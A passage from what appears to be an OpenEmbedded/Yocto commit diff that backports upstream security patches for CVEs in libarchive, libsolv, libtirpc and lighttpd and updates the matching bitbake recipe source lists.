14 | libarchive/archive_read_support_format_zip.c | 2 +- | ||
15 | 1 file changed, 1 insertion(+), 1 deletion(-) | ||
16 | |||
17 | diff --git a/libarchive/archive_read_support_format_zip.c b/libarchive/archive_read_support_format_zip.c | ||
18 | index 38ada70b5..9d6c900b2 100644 | ||
19 | --- a/libarchive/archive_read_support_format_zip.c | ||
20 | +++ b/libarchive/archive_read_support_format_zip.c | ||
21 | @@ -1667,7 +1667,7 @@ zipx_lzma_alone_init(struct archive_read *a, struct zip *zip) | ||
22 | */ | ||
23 | |||
24 | /* Read magic1,magic2,lzma_params from the ZIPX stream. */ | ||
25 | - if((p = __archive_read_ahead(a, 9, NULL)) == NULL) { | ||
26 | + if(zip->entry_bytes_remaining < 9 || (p = __archive_read_ahead(a, 9, NULL)) == NULL) { | ||
27 | archive_set_error(&a->archive, ARCHIVE_ERRNO_FILE_FORMAT, | ||
28 | "Truncated lzma data"); | ||
29 | return (ARCHIVE_FATAL); | ||
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch new file mode 100644 index 0000000000..980a0e884a --- /dev/null +++ b/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch | |||
@@ -0,0 +1,43 @@ | |||
1 | From 6311080bff566fcc5591dadfd78efb41705b717f Mon Sep 17 00:00:00 2001 | ||
2 | From: obiwac <obiwac@gmail.com> | ||
3 | Date: Fri, 22 Jul 2022 22:41:10 +0200 | ||
4 | Subject: [PATCH] CVE-2022-36227 | ||
5 | |||
6 | libarchive: CVE-2022-36227 Handle a `calloc` returning NULL (fixes #1754) | ||
7 | |||
8 | Upstream-Status: Backport [https://github.com/libarchive/libarchive/commit/bff38efe8c110469c5080d387bec62a6ca15b1a5] | ||
9 | CVE: CVE-2022-36227 | ||
10 | Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com | ||
11 | --- | ||
12 | libarchive/archive_write.c | 8 ++++++++ | ||
13 | 1 file changed, 8 insertions(+) | ||
14 | |||
15 | diff --git a/libarchive/archive_write.c b/libarchive/archive_write.c | ||
16 | index 98a55fb..7fe88b6 100644 | ||
17 | --- a/libarchive/archive_write.c | ||
18 | +++ b/libarchive/archive_write.c | ||
19 | @@ -211,6 +211,10 @@ __archive_write_allocate_filter(struct archive *_a) | ||
20 | struct archive_write_filter *f; | ||
21 | |||
22 | f = calloc(1, sizeof(*f)); | ||
23 | + | ||
24 | + if (f == NULL) | ||
25 | + return (NULL); | ||
26 | + | ||
27 | f->archive = _a; | ||
28 | f->state = ARCHIVE_WRITE_FILTER_STATE_NEW; | ||
29 | if (a->filter_first == NULL) | ||
30 | @@ -527,6 +531,10 @@ archive_write_open(struct archive *_a, void *client_data, | ||
31 | a->client_data = client_data; | ||
32 | |||
33 | client_filter = __archive_write_allocate_filter(_a); | ||
34 | + | ||
35 | + if (client_filter == NULL) | ||
36 | + return (ARCHIVE_FATAL); | ||
37 | + | ||
38 | client_filter->open = archive_write_client_open; | ||
39 | client_filter->write = archive_write_client_write; | ||
40 | client_filter->close = archive_write_client_close; | ||
41 | -- | ||
42 | 2.25.1 | ||
43 | |||
diff --git a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb index 0ab40fc096..728eedc401 100644 --- a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb +++ b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb | |||
@@ -32,11 +32,23 @@ PACKAGECONFIG[mbedtls] = "--with-mbedtls,--without-mbedtls,mbedtls," | |||
32 | 32 | ||
33 | EXTRA_OECONF += "--enable-largefile" | 33 | EXTRA_OECONF += "--enable-largefile" |
34 | 34 | ||
35 | SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz" | 35 | SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz \ |
36 | file://CVE-2021-36976-1.patch \ | ||
37 | file://CVE-2021-36976-2.patch \ | ||
38 | file://CVE-2021-36976-3.patch \ | ||
39 | file://CVE-2021-23177.patch \ | ||
40 | file://CVE-2021-31566-01.patch \ | ||
41 | file://CVE-2021-31566-02.patch \ | ||
42 | file://CVE-2022-26280.patch \ | ||
43 | file://CVE-2022-36227.patch \ | ||
44 | " | ||
36 | 45 | ||
37 | SRC_URI[md5sum] = "d953ed6b47694dadf0e6042f8f9ff451" | 46 | SRC_URI[md5sum] = "d953ed6b47694dadf0e6042f8f9ff451" |
38 | SRC_URI[sha256sum] = "b60d58d12632ecf1e8fad7316dc82c6b9738a35625746b47ecdcaf4aed176176" | 47 | SRC_URI[sha256sum] = "b60d58d12632ecf1e8fad7316dc82c6b9738a35625746b47ecdcaf4aed176176" |
39 | 48 | ||
49 | # upstream-wontfix: upstream has documented that reported function is not thread-safe | ||
50 | CVE_CHECK_WHITELIST += "CVE-2023-30571" | ||
51 | |||
40 | inherit autotools update-alternatives pkgconfig | 52 | inherit autotools update-alternatives pkgconfig |
41 | 53 | ||
42 | CPPFLAGS += "-I${WORKDIR}/extra-includes" | 54 | CPPFLAGS += "-I${WORKDIR}/extra-includes" |
diff --git a/meta/recipes-extended/libnsl/libnsl2_git.bb b/meta/recipes-extended/libnsl/libnsl2_git.bb index 28c84af7ad..cbb38674b9 100644 --- a/meta/recipes-extended/libnsl/libnsl2_git.bb +++ b/meta/recipes-extended/libnsl/libnsl2_git.bb | |||
@@ -14,7 +14,7 @@ PV = "1.2.0+git${SRCPV}" | |||
14 | 14 | ||
15 | SRCREV = "4a062cf4180d99371198951e4ea5b4550efd58a3" | 15 | SRCREV = "4a062cf4180d99371198951e4ea5b4550efd58a3" |
16 | 16 | ||
17 | SRC_URI = "git://github.com/thkukuk/libnsl \ | 17 | SRC_URI = "git://github.com/thkukuk/libnsl;branch=master;protocol=https \ |
18 | " | 18 | " |
19 | 19 | ||
20 | S = "${WORKDIR}/git" | 20 | S = "${WORKDIR}/git" |
diff --git a/meta/recipes-extended/libnss-nis/libnss-nis.bb b/meta/recipes-extended/libnss-nis/libnss-nis.bb index a1d914e871..0ec64544be 100644 --- a/meta/recipes-extended/libnss-nis/libnss-nis.bb +++ b/meta/recipes-extended/libnss-nis/libnss-nis.bb | |||
@@ -13,11 +13,11 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" | |||
13 | SECTION = "libs" | 13 | SECTION = "libs" |
14 | DEPENDS += "libtirpc libnsl2" | 14 | DEPENDS += "libtirpc libnsl2" |
15 | 15 | ||
16 | PV = "3.1+git${SRCPV}" | 16 | PV = "3.2" |
17 | 17 | ||
18 | SRCREV = "062f31999b35393abf7595cb89dfc9590d5a42ad" | 18 | SRCREV = "cd0d391af9535b56e612ed227c1b89be269f3d59" |
19 | 19 | ||
20 | SRC_URI = "git://github.com/thkukuk/libnss_nis \ | 20 | SRC_URI = "git://github.com/thkukuk/libnss_nis;branch=master;protocol=https \ |
21 | " | 21 | " |
22 | 22 | ||
23 | S = "${WORKDIR}/git" | 23 | S = "${WORKDIR}/git" |
diff --git a/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch b/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch new file mode 100644 index 0000000000..fa577fd533 --- /dev/null +++ b/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch | |||
@@ -0,0 +1,82 @@ | |||
1 | From 0077ef29eb46d2e1df2f230fc95a1d9748d49dec Mon Sep 17 00:00:00 2001 | ||
2 | From: Michael Schroeder <mls@suse.de> | ||
3 | Date: Mon, 14 Dec 2020 11:12:00 +0100 | ||
4 | Subject: [PATCH] testcase_read: error out if repos are added or the system is | ||
5 | changed too late | ||
6 | |||
7 | We must not add new solvables after the considered map was created, the solver | ||
8 | was created, or jobs were added. We may not changed the system after jobs have | ||
9 | been added. | ||
10 | |||
11 | (Jobs may point inside the whatproviedes array, so we must not invalidate this | ||
12 | area.) | ||
13 | |||
14 | Upstream-Status: Backport [https://github.com/openSUSE/libsolv/commit/0077ef29eb46d2e1df2f230fc95a1d9748d49dec] | ||
15 | CVE: CVE-2021-3200 | ||
16 | CVE: CVE-2021-33928 | ||
17 | CVE: CVE-2021-33929 | ||
18 | CVE: CVE-2021-33930 | ||
19 | CVE: CVE-2021-33938 | ||
20 | CVE: CVE-2021-44568 | ||
21 | CVE: CVE-2021-44569 | ||
22 | CVE: CVE-2021-44570 | ||
23 | CVE: CVE-2021-44571 | ||
24 | CVE: CVE-2021-44573 | ||
25 | CVE: CVE-2021-44574 | ||
26 | CVE: CVE-2021-44575 | ||
27 | CVE: CVE-2021-44576 | ||
28 | CVE: CVE-2021-44577 | ||
29 | Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> | ||
30 | |||
31 | Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com> | ||
32 | Signed-off-by: Steve Sakoman <steve@sakoman.com> | ||
33 | --- | ||
34 | ext/testcase.c | 21 +++++++++++++++++++++ | ||
35 | 1 file changed, 21 insertions(+) | ||
36 | |||
37 | diff --git a/ext/testcase.c b/ext/testcase.c | ||
38 | index 0be7a213..8fb6d793 100644 | ||
39 | --- a/ext/testcase.c | ||
40 | +++ b/ext/testcase.c | ||
41 | @@ -1991,6 +1991,7 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res | ||
42 | Id *genid = 0; | ||
43 | int ngenid = 0; | ||
44 | Queue autoinstq; | ||
45 | + int oldjobsize = job ? job->count : 0; | ||
46 | |||
47 | if (resultp) | ||
48 | *resultp = 0; | ||
49 | @@ -2065,6 +2066,21 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res | ||
50 | int prio, subprio; | ||
51 | const char *rdata; | ||
52 | |||
53 | + if (pool->considered) | ||
54 | + { | ||
55 | + pool_error(pool, 0, "testcase_read: cannot add repos after packages were disabled"); | ||
56 | + continue; | ||
57 | + } | ||
58 | + if (solv) | ||
59 | + { | ||
60 | + pool_error(pool, 0, "testcase_read: cannot add repos after the solver was created"); | ||
61 | + continue; | ||
62 | + } | ||
63 | + if (job && job->count != oldjobsize) | ||
64 | + { | ||
65 | + pool_error(pool, 0, "testcase_read: cannot add repos after jobs have been created"); | ||
66 | + continue; | ||
67 | + } | ||
68 | prepared = 0; | ||
69 | if (!poolflagsreset) | ||
70 | { | ||
71 | @@ -2125,6 +2141,11 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res | ||
72 | int i; | ||
73 | |||
74 | /* must set the disttype before the arch */ | ||
75 | + if (job && job->count != oldjobsize) | ||
76 | + { | ||
77 | + pool_error(pool, 0, "testcase_read: cannot change the system after jobs have been created"); | ||
78 | + continue; | ||
79 | + } | ||
80 | prepared = 0; | ||
81 | if (strcmp(pieces[2], "*") != 0) | ||
82 | { | ||
diff --git a/meta/recipes-extended/libsolv/libsolv_0.7.10.bb b/meta/recipes-extended/libsolv/libsolv_0.7.10.bb index 265a27c00d..2c2aedc32c 100644 --- a/meta/recipes-extended/libsolv/libsolv_0.7.10.bb +++ b/meta/recipes-extended/libsolv/libsolv_0.7.10.bb | |||
@@ -1,4 +1,5 @@ | |||
1 | SUMMARY = "Library for solving packages and reading repositories" | 1 | SUMMARY = "Library for solving packages and reading repositories" |
2 | DESCRIPTION = "This is libsolv, a free package dependency solver using a satisfiability algorithm for solving packages and reading repositories" | ||
2 | HOMEPAGE = "https://github.com/openSUSE/libsolv" | 3 | HOMEPAGE = "https://github.com/openSUSE/libsolv" |
3 | BUGTRACKER = "https://github.com/openSUSE/libsolv/issues" | 4 | BUGTRACKER = "https://github.com/openSUSE/libsolv/issues" |
4 | SECTION = "devel" | 5 | SECTION = "devel" |
@@ -7,7 +8,8 @@ LIC_FILES_CHKSUM = "file://LICENSE.BSD;md5=62272bd11c97396d4aaf1c41bc11f7d8" | |||
7 | 8 | ||
8 | DEPENDS = "expat zlib" | 9 | DEPENDS = "expat zlib" |
9 | 10 | ||
10 | SRC_URI = "git://github.com/openSUSE/libsolv.git \ | 11 | SRC_URI = "git://github.com/openSUSE/libsolv.git;branch=master;protocol=https \ |
12 | file://CVE-2021-3200.patch \ | ||
11 | " | 13 | " |
12 | 14 | ||
13 | SRCREV = "605dd2645ef899e2b7c95709476fb51e28d7e378" | 15 | SRCREV = "605dd2645ef899e2b7c95709476fb51e28d7e378" |
diff --git a/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch b/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch new file mode 100644 index 0000000000..c78e7ef4d5 --- /dev/null +++ b/meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch | |||
@@ -0,0 +1,155 @@ | |||
1 | From 48309e7cb230fc539c3edab0b3363f8ce973194f Mon Sep 17 00:00:00 2001 | ||
2 | From: Hitendra Prajapati <hprajapati@mvista.com> | ||
3 | Date: Thu, 28 Jul 2022 09:11:04 +0530 | ||
4 | Subject: [PATCH] CVE-2021-46828 | ||
5 | |||
6 | Upstream-Status: Backport [http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed} | ||
7 | CVE: CVE-2021-46828 | ||
8 | Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> | ||
9 | --- | ||
10 | src/svc.c | 17 +++++++++++++- | ||
11 | src/svc_vc.c | 62 +++++++++++++++++++++++++++++++++++++++++++++++++++- | ||
12 | 2 files changed, 77 insertions(+), 2 deletions(-) | ||
13 | |||
14 | diff --git a/src/svc.c b/src/svc.c | ||
15 | index 6db164b..3a8709f 100644 | ||
16 | --- a/src/svc.c | ||
17 | +++ b/src/svc.c | ||
18 | @@ -57,7 +57,7 @@ | ||
19 | |||
20 | #define max(a, b) (a > b ? a : b) | ||
21 | |||
22 | -static SVCXPRT **__svc_xports; | ||
23 | +SVCXPRT **__svc_xports; | ||
24 | int __svc_maxrec; | ||
25 | |||
26 | /* | ||
27 | @@ -194,6 +194,21 @@ __xprt_do_unregister (xprt, dolock) | ||
28 | rwlock_unlock (&svc_fd_lock); | ||
29 | } | ||
30 | |||
31 | +int | ||
32 | +svc_open_fds() | ||
33 | +{ | ||
34 | + int ix; | ||
35 | + int nfds = 0; | ||
36 | + | ||
37 | + rwlock_rdlock (&svc_fd_lock); | ||
38 | + for (ix = 0; ix < svc_max_pollfd; ++ix) { | ||
39 | + if (svc_pollfd[ix].fd != -1) | ||
40 | + nfds++; | ||
41 | + } | ||
42 | + rwlock_unlock (&svc_fd_lock); | ||
43 | + return (nfds); | ||
44 | +} | ||
45 | + | ||
46 | /* | ||
47 | * Add a service program to the callout list. | ||
48 | * The dispatch routine will be called when a rpc request for this | ||
49 | diff --git a/src/svc_vc.c b/src/svc_vc.c | ||
50 | index c23cd36..1729963 100644 | ||
51 | --- a/src/svc_vc.c | ||
52 | +++ b/src/svc_vc.c | ||
53 | @@ -64,6 +64,8 @@ | ||
54 | |||
55 | |||
56 | extern rwlock_t svc_fd_lock; | ||
57 | +extern SVCXPRT **__svc_xports; | ||
58 | +extern int svc_open_fds(); | ||
59 | |||
60 | static SVCXPRT *makefd_xprt(int, u_int, u_int); | ||
61 | static bool_t rendezvous_request(SVCXPRT *, struct rpc_msg *); | ||
62 | @@ -82,6 +84,7 @@ static void svc_vc_ops(SVCXPRT *); | ||
63 | static bool_t svc_vc_control(SVCXPRT *xprt, const u_int rq, void *in); | ||
64 | static bool_t svc_vc_rendezvous_control (SVCXPRT *xprt, const u_int rq, | ||
65 | void *in); | ||
66 | +static int __svc_destroy_idle(int timeout); | ||
67 | |||
68 | struct cf_rendezvous { /* kept in xprt->xp_p1 for rendezvouser */ | ||
69 | u_int sendsize; | ||
70 | @@ -312,13 +315,14 @@ done: | ||
71 | return (xprt); | ||
72 | } | ||
73 | |||
74 | + | ||
75 | /*ARGSUSED*/ | ||
76 | static bool_t | ||
77 | rendezvous_request(xprt, msg) | ||
78 | SVCXPRT *xprt; | ||
79 | struct rpc_msg *msg; | ||
80 | { | ||
81 | - int sock, flags; | ||
82 | + int sock, flags, nfds, cnt; | ||
83 | struct cf_rendezvous *r; | ||
84 | struct cf_conn *cd; | ||
85 | struct sockaddr_storage addr; | ||
86 | @@ -378,6 +382,16 @@ again: | ||
87 | |||
88 | gettimeofday(&cd->last_recv_time, NULL); | ||
89 | |||
90 | + nfds = svc_open_fds(); | ||
91 | + if (nfds >= (_rpc_dtablesize() / 5) * 4) { | ||
92 | + /* destroy idle connections */ | ||
93 | + cnt = __svc_destroy_idle(15); | ||
94 | + if (cnt == 0) { | ||
95 | + /* destroy least active */ | ||
96 | + __svc_destroy_idle(0); | ||
97 | + } | ||
98 | + } | ||
99 | + | ||
100 | return (FALSE); /* there is never an rpc msg to be processed */ | ||
101 | } | ||
102 | |||
103 | @@ -819,3 +833,49 @@ __svc_clean_idle(fd_set *fds, int timeout, bool_t cleanblock) | ||
104 | { | ||
105 | return FALSE; | ||
106 | } | ||
107 | + | ||
108 | +static int | ||
109 | +__svc_destroy_idle(int timeout) | ||
110 | +{ | ||
111 | + int i, ncleaned = 0; | ||
112 | + SVCXPRT *xprt, *least_active; | ||
113 | + struct timeval tv, tdiff, tmax; | ||
114 | + struct cf_conn *cd; | ||
115 | + | ||
116 | + gettimeofday(&tv, NULL); | ||
117 | + tmax.tv_sec = tmax.tv_usec = 0; | ||
118 | + least_active = NULL; | ||
119 | + rwlock_wrlock(&svc_fd_lock); | ||
120 | + | ||
121 | + for (i = 0; i <= svc_max_pollfd; i++) { | ||
122 | + if (svc_pollfd[i].fd == -1) | ||
123 | + continue; | ||
124 | + xprt = __svc_xports[i]; | ||
125 | + if (xprt == NULL || xprt->xp_ops == NULL || | ||
126 | + xprt->xp_ops->xp_recv != svc_vc_recv) | ||
127 | + continue; | ||
128 | + cd = (struct cf_conn *)xprt->xp_p1; | ||
129 | + if (!cd->nonblock) | ||
130 | + continue; | ||
131 | + if (timeout == 0) { | ||
132 | + timersub(&tv, &cd->last_recv_time, &tdiff); | ||
133 | + if (timercmp(&tdiff, &tmax, >)) { | ||
134 | + tmax = tdiff; | ||
135 | + least_active = xprt; | ||
136 | + } | ||
137 | + continue; | ||
138 | + } | ||
139 | + if (tv.tv_sec - cd->last_recv_time.tv_sec > timeout) { | ||
140 | + __xprt_unregister_unlocked(xprt); | ||
141 | + __svc_vc_dodestroy(xprt); | ||
142 | + ncleaned++; | ||
143 | + } | ||
144 | + } | ||
145 | + if (timeout == 0 && least_active != NULL) { | ||
146 | + __xprt_unregister_unlocked(least_active); | ||
147 | + __svc_vc_dodestroy(least_active); | ||
148 | + ncleaned++; | ||
149 | + } | ||
150 | + rwlock_unlock(&svc_fd_lock); | ||
151 | + return (ncleaned); | ||
152 | +} | ||
153 | -- | ||
154 | 2.25.1 | ||
155 | |||
diff --git a/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb b/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb index 10a324c3b6..80151ff83a 100644 --- a/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb +++ b/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb | |||
@@ -9,7 +9,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f835cce8852481e4b2bbbdd23b5e47f3 \ | |||
9 | 9 | ||
10 | PROVIDES = "virtual/librpc" | 10 | PROVIDES = "virtual/librpc" |
11 | 11 | ||
12 | SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BP}.tar.bz2" | 12 | SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BP}.tar.bz2 \ |
13 | file://CVE-2021-46828.patch \ | ||
14 | " | ||
13 | UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/libtirpc/files/libtirpc/" | 15 | UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/libtirpc/files/libtirpc/" |
14 | UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)/" | 16 | UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)/" |
15 | SRC_URI[md5sum] = "b25f9cc18bfad50f7c446c77f4ae00bb" | 17 | SRC_URI[md5sum] = "b25f9cc18bfad50f7c446c77f4ae00bb" |
@@ -20,7 +22,7 @@ inherit autotools pkgconfig | |||
20 | EXTRA_OECONF = "--disable-gssapi" | 22 | EXTRA_OECONF = "--disable-gssapi" |
21 | 23 | ||
22 | do_install_append() { | 24 | do_install_append() { |
23 | chown root:root ${D}${sysconfdir}/netconfig | 25 | test -e ${D}${sysconfdir}/netconfig && chown root:root ${D}${sysconfdir}/netconfig |
24 | } | 26 | } |
25 | 27 | ||
26 | BBCLASSEXTEND = "native nativesdk" | 28 | BBCLASSEXTEND = "native nativesdk" |
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch index f17bdce2c0..44b9136b05 100644 --- a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch +++ b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch | |||
@@ -1,4 +1,4 @@ | |||
1 | From 22afc5d9aaa215c3c87ba21c77d47da44ab3b113 Mon Sep 17 00:00:00 2001 | 1 | From f918d5ba6ff1d439822be063237aea2705ea27b8 Mon Sep 17 00:00:00 2001 |
2 | From: Alexander Kanavin <alex.kanavin@gmail.com> | 2 | From: Alexander Kanavin <alex.kanavin@gmail.com> |
3 | Date: Fri, 26 Aug 2016 18:20:32 +0300 | 3 | Date: Fri, 26 Aug 2016 18:20:32 +0300 |
4 | Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script. | 4 | Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script. |
@@ -6,15 +6,16 @@ Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script. | |||
6 | RP 2014/5/22 | 6 | RP 2014/5/22 |
7 | Upstream-Status: Pending | 7 | Upstream-Status: Pending |
8 | Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> | 8 | Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> |
9 | |||
9 | --- | 10 | --- |
10 | configure.ac | 16 ++++++++++++---- | 11 | configure.ac | 16 ++++++++++++---- |
11 | 1 file changed, 12 insertions(+), 4 deletions(-) | 12 | 1 file changed, 12 insertions(+), 4 deletions(-) |
12 | 13 | ||
13 | diff --git a/configure.ac b/configure.ac | 14 | diff --git a/configure.ac b/configure.ac |
14 | index 5383cec..c29a902 100644 | 15 | index dbddfb9..62cf17f 100644 |
15 | --- a/configure.ac | 16 | --- a/configure.ac |
16 | +++ b/configure.ac | 17 | +++ b/configure.ac |
17 | @@ -651,10 +651,18 @@ AC_ARG_WITH([pcre], | 18 | @@ -748,10 +748,18 @@ AC_ARG_WITH([pcre], |
18 | ) | 19 | ) |
19 | AC_MSG_RESULT([$WITH_PCRE]) | 20 | AC_MSG_RESULT([$WITH_PCRE]) |
20 | 21 | ||
@@ -37,6 +38,3 @@ index 5383cec..c29a902 100644 | |||
37 | else | 38 | else |
38 | AC_PATH_PROG([PCRECONFIG], [pcre-config]) | 39 | AC_PATH_PROG([PCRECONFIG], [pcre-config]) |
39 | if test -n "$PCRECONFIG"; then | 40 | if test -n "$PCRECONFIG"; then |
40 | -- | ||
41 | 2.15.0 | ||
42 | |||
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch new file mode 100644 index 0000000000..e226366112 --- /dev/null +++ b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch | |||
@@ -0,0 +1,224 @@ | |||
1 | From a566fe4cc9f9d0ef9cfdcbc13159ef0644e91c9c Mon Sep 17 00:00:00 2001 | ||
2 | From: Glenn Strauss <gstrauss@gluelogic.com> | ||
3 | Date: Wed, 23 Dec 2020 23:14:47 -0500 | ||
4 | Subject: [PATCH] reuse large mem chunks (fix mem usage) (fixes #3033) | ||
5 | |||
6 | (cherry picked from commit 7ba521ffb4959f6f74a609d5d4acafc29a038337) | ||
7 | |||
8 | (thx flynn) | ||
9 | |||
10 | fix large memory usage for large file downloads from dynamic backends | ||
11 | |||
12 | reuse or release large memory chunks | ||
13 | |||
14 | x-ref: | ||
15 | "Memory Growth with PUT and full buffered streams" | ||
16 | https://redmine.lighttpd.net/issues/3033 | ||
17 | |||
18 | Upstream-Status: Backport | ||
19 | Comment: Hunk refreshed to make it backword compatible. | ||
20 | https://redmine.lighttpd.net/projects/lighttpd/repository/14/revisions/7ba521ffb4959f6f74a609d5d4acafc29a038337 | ||
21 | Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com> | ||
22 | |||
23 | --- | ||
24 | src/chunk.c | 99 +++++++++++++++++++++++++++++++++--------- | ||
25 | src/chunk.h | 2 + | ||
26 | src/http-header-glue.c | 2 +- | ||
27 | 3 files changed, 82 insertions(+), 21 deletions(-) | ||
28 | |||
29 | diff --git a/src/chunk.c b/src/chunk.c | ||
30 | index 133308f..d7259b9 100644 | ||
31 | --- a/src/chunk.c | ||
32 | +++ b/src/chunk.c | ||
33 | @@ -28,16 +28,20 @@ | ||
34 | static size_t chunk_buf_sz = 8192; | ||
35 | static chunk *chunks, *chunks_oversized; | ||
36 | static chunk *chunk_buffers; | ||
37 | +static int chunks_oversized_n; | ||
38 | static array *chunkqueue_default_tempdirs = NULL; | ||
39 | static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; | ||
40 | |||
41 | void chunkqueue_set_chunk_size (size_t sz) | ||
42 | { | ||
43 | - chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192; | ||
44 | + size_t x = 1024; | ||
45 | + while (x < sz && x < (1u << 30)) x <<= 1; | ||
46 | + chunk_buf_sz = sz > 0 ? x : 8192; | ||
47 | } | ||
48 | |||
49 | void chunkqueue_set_tempdirs_default_reset (void) | ||
50 | { | ||
51 | + chunk_buf_sz = 8192; | ||
52 | chunkqueue_default_tempdirs = NULL; | ||
53 | chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; | ||
54 | } | ||
55 | @@ -120,15 +124,49 @@ static void chunk_free(chunk *c) { | ||
56 | free(c); | ||
57 | } | ||
58 | |||
59 | -buffer * chunk_buffer_acquire(void) { | ||
60 | +static chunk * chunk_pop_oversized(size_t sz) { | ||
61 | + /* future: might have buckets of certain sizes, up to socket buf sizes */ | ||
62 | + if (chunks_oversized && chunks_oversized->mem->size >= sz) { | ||
63 | + --chunks_oversized_n; | ||
64 | + chunk *c = chunks_oversized; | ||
65 | + chunks_oversized = c->next; | ||
66 | + return c; | ||
67 | + } | ||
68 | + return NULL; | ||
69 | +} | ||
70 | + | ||
71 | +static void chunk_push_oversized(chunk * const c, const size_t sz) { | ||
72 | + if (chunks_oversized_n < 64 && chunk_buf_sz >= 4096) { | ||
73 | + ++chunks_oversized_n; | ||
74 | + chunk **co = &chunks_oversized; | ||
75 | + while (*co && sz < (*co)->mem->size) co = &(*co)->next; | ||
76 | + c->next = *co; | ||
77 | + *co = c; | ||
78 | + } | ||
79 | + else | ||
80 | + chunk_free(c); | ||
81 | +} | ||
82 | + | ||
83 | +static buffer * chunk_buffer_acquire_sz(size_t sz) { | ||
84 | chunk *c; | ||
85 | buffer *b; | ||
86 | - if (chunks) { | ||
87 | - c = chunks; | ||
88 | - chunks = c->next; | ||
89 | + if (sz <= chunk_buf_sz) { | ||
90 | + if (chunks) { | ||
91 | + c = chunks; | ||
92 | + chunks = c->next; | ||
93 | + } | ||
94 | + else | ||
95 | + c = chunk_init(chunk_buf_sz); | ||
96 | + /* future: might choose to pop from chunks_oversized, if available | ||
97 | + * (even if larger than sz) rather than allocating new chunk | ||
98 | + * (and if doing so, might replace chunks_oversized_n) */ | ||
99 | } | ||
100 | else { | ||
101 | - c = chunk_init(chunk_buf_sz); | ||
102 | + /*(round up to nearest chunk_buf_sz)*/ | ||
103 | + sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1); | ||
104 | + c = chunk_pop_oversized(sz); | ||
105 | + if (NULL == c) | ||
106 | + c = chunk_init(sz); | ||
107 | } | ||
108 | c->next = chunk_buffers; | ||
109 | chunk_buffers = c; | ||
110 | @@ -137,21 +175,47 @@ buffer * chunk_buffer_acquire(void) { | ||
111 | return b; | ||
112 | } | ||
113 | |||
114 | +buffer * chunk_buffer_acquire(void) { | ||
115 | + return chunk_buffer_acquire_sz(chunk_buf_sz); | ||
116 | +} | ||
117 | + | ||
118 | void chunk_buffer_release(buffer *b) { | ||
119 | if (NULL == b) return; | ||
120 | - if (b->size >= chunk_buf_sz && chunk_buffers) { | ||
121 | + if (chunk_buffers) { | ||
122 | chunk *c = chunk_buffers; | ||
123 | chunk_buffers = c->next; | ||
124 | c->mem = b; | ||
125 | - c->next = chunks; | ||
126 | - chunks = c; | ||
127 | buffer_clear(b); | ||
128 | + if (b->size == chunk_buf_sz) { | ||
129 | + c->next = chunks; | ||
130 | + chunks = c; | ||
131 | + } | ||
132 | + else if (b->size > chunk_buf_sz) | ||
133 | + chunk_push_oversized(c, b->size); | ||
134 | + else | ||
135 | + chunk_free(c); | ||
136 | } | ||
137 | else { | ||
138 | buffer_free(b); | ||
139 | } | ||
140 | } | ||
141 | |||
142 | +size_t chunk_buffer_prepare_append(buffer * const b, size_t sz) { | ||
